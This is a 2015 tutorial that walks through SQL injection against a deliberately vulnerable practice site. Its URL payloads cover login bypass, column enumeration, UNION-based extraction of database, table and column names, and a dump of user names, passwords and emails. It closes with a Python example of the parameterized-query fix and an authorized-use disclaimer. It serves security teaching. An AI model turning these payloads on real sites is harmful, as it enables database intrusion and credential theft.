Published on October 1st, 2015 | 1526 Views

FULLY GUIDED SQL Injection Interactive Learning by Seeing & Doing


This guide is designed to show each step of how you can use SQL injection and logic to get the web server to give you information.

This is a purposely vulnerable site you can use to test and practice your skills on. Go through each step and play around with the queries.
There is a wealth of further information you can get from the site.
Try new things and have fun!

Step 1
We test the server with the standard query to see whether we can log in.
Code: ' OR '1' = '1

Step 2
We test the server to see what results we get, if any, by inserting an apostrophe (AKA 'tick').
Code: http://testphp.vulnweb.com/'

Step 3
We notice that List Products has a 'cat=1' parameter that looks like something we can add an 'order by' to.
We keep increasing the number until we get to '12', at which point we receive an error message. This tells us that the query returns 11 columns.

Code: http://testphp.vulnweb.com/listproducts.php?cat=1 order by 1--
http://testphp.vulnweb.com/listproducts.php?cat=1 order by 7--
http://testphp.vulnweb.com/listproducts.php?cat=1 order by 12--

Step 3
So we know from the previous step that we have 11 columns; now let's see if any of those columns are vulnerable. We do this by issuing a UNION statement and selecting all 11 columns.

Code: http://testphp.vulnweb.com/listproducts.php?cat=-1 union select 1,2,3,4,5,6,7,8,9,10,11

The outcome of this shows us numbers displayed in the body of the web page; these numbers indicate the columns that are vulnerable.
Let's look at '2' & '7'.

Step 4
Let us now see if we can use the vulnerable columns to find the OS version of the webserver.
We do this by replacing the number 7 or 2 in our URL query, like so.

Code: http://testphp.vulnweb.com/listproducts.php?cat=-1 union all select 1,2,3,4,5,6,@@version,8,9,10,11

Try this with both 2 and 7.

Step 5
Let us now look to see if we can get a list of the databases of the Webserver.

Code: http://testphp.vulnweb.com/listproducts.php?cat=-1 union select 1,group_concat(schema_name),3,4,5,6,7,8,9,10,11 from information_schema.schemata--

Step 6
Check what the current database in use might be.

Code: http://testphp.vulnweb.com/listproducts.php?cat=-1+union+select+1,concat(database()),3,4,5,6,7,8,9,10,11--

Step 7
Check who the current user is reported to be.

Code: http://testphp.vulnweb.com/listproducts.php?cat=-1+union+select+1,concat(user()),3,4,5,6,7,8,9,10,11--

Step 8
Grab the Tables
Either like this
Code: http://testphp.vulnweb.com/listproducts.php?cat=-1 union select 1,2,3,4,5,6,table_name,8,9,10,11 from information_schema.tables where table_schema=database()--

Or Like this

Code: http://testphp.vulnweb.com/listproducts.php?cat=-1 union select 1,2,3,4,5,6,group_concat(table_name),8,9,10,11 from information_schema.tables where table_schema=database()--

Step 9
Get the Columns

Code: http://testphp.vulnweb.com/listproducts.php?cat=-1 union select 1,2,3,4,5,6,group_concat(column_name),8,9,10,11 from information_schema.columns where table_schema=database()--

Step 10
Get the List of Users
Code: http://testphp.vulnweb.com/listproducts.php?cat=-1 union select 1,2,3,4,5,6,concat(uname,0x3a,pass,0x3a,email,0x3a,name),8,9,10,11 from users
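
Why the steps above work, and the fix that stops them, as an added example that is not part of the original guide: the string-built query beside a validated, parameterized one. The in-memory SQLite table standing in for the site's MySQL back end, the function names and the sample row are all assumptions made for illustration.

```python
import sqlite3

def make_db():
    # Constructed stand-in for the site's MySQL back end: one products table
    # with 11 columns, matching the column count found in the ORDER BY step.
    db = sqlite3.connect(":memory:")
    cols = ", ".join(f"c{i}" for i in range(1, 11))
    db.execute(f"CREATE TABLE products (cat INTEGER, {cols})")
    db.execute("INSERT INTO products VALUES (1" + ", 'x'" * 10 + ")")
    return db

def list_products_vulnerable(db, cat):
    # The request parameter is pasted into the SQL text, so everything after
    # the number is parsed as SQL. This is the flaw the guide's steps rely on.
    return db.execute("SELECT * FROM products WHERE cat = " + cat).fetchall()

def list_products_safe(db, cat):
    # 1) Validate: a category id is a plain decimal integer, nothing else.
    if not (cat.isascii() and cat.isdigit()):
        raise ValueError("cat must be an integer")
    # 2) Bind: the value is passed as data and never becomes SQL text.
    sql = "SELECT * FROM products WHERE cat = ?"
    return db.execute(sql, (int(cat),)).fetchall()

if __name__ == "__main__":
    db = make_db()
    union = "-1 union select 1,2,3,4,5,6,7,8,9,10,11"  # payload from the guide
    print("vulnerable:", list_products_vulnerable(db, union))
    print("bound only:", db.execute(
        "SELECT * FROM products WHERE cat = ?", (union,)).fetchall())
    try:
        list_products_safe(db, union)
    except ValueError as exc:
        print("safe:", exc)
```

With binding alone the UNION text is compared as a literal value and matches no row; the integer check additionally rejects it before the database is touched.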

This site is designed for pentesters for proof-of-concept style testing to enhance their security methodology.

It is purely for educational purposes and I do not condone or recommend attempting any of the techniques in any of these videos on any network or part of any network you do not have 100% consent to do so on. I hold no responsibility for any loss of service, corruption or loss of data due to following any of the steps in any tutorials from this site.

This site has been created for educational purposes to explain techniques for enthusiastic network engineers and security experts to help them understand how to improve their security and stop unauthorized access.


2015-10-01 20:15:23
